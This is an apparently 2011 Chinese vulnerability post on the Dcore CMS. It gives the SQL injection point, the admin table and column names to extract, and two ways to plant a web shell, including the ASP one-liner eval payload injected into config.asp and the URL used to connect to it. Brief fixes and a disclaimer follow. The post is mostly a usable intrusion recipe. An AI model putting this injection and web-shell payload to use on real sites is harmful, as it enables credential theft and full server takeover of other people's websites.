Dcore(轻型CMS系统)注入漏洞与后拿SHELL

发布日期：2011-04.26
发布作者：Mr.DzY

漏洞类型：SQL注入
漏洞分析：Dcore(轻型CMS系统)存在SQL注入漏洞，可获取网站shell.

SQL注入

http://www.hackline.net/index.asp?subsite=1
在工具里增加表名：dcore_user 列名：user_admin user_password
如果不怕麻烦也可以手工猜解。
 

拿shell方法1：
后台--->风格管理--->选任意风格修改成Mr.DzY.asp--->编辑皮肤

方法2：

再看程序过程中发现根目录文件config.asp，是网站配置，也就是说后台直接修改网站配置信息写入一句话就能连接之，和南方数据企业网站管理系统后台一样

直接在信息版本后加上"%><%eval request("#")%><%' 加好后，是不显示这些代码的，还是原来的样子，但其实已经可以了

后面直接一句话连接之http://wwww.hackline.net/config.asp

修补方法：加强密码强度/过滤非法字符/修改默认路径

本文只作技术交流。对其引起的后果，自行承担。本人概不负责。
 

标签分类：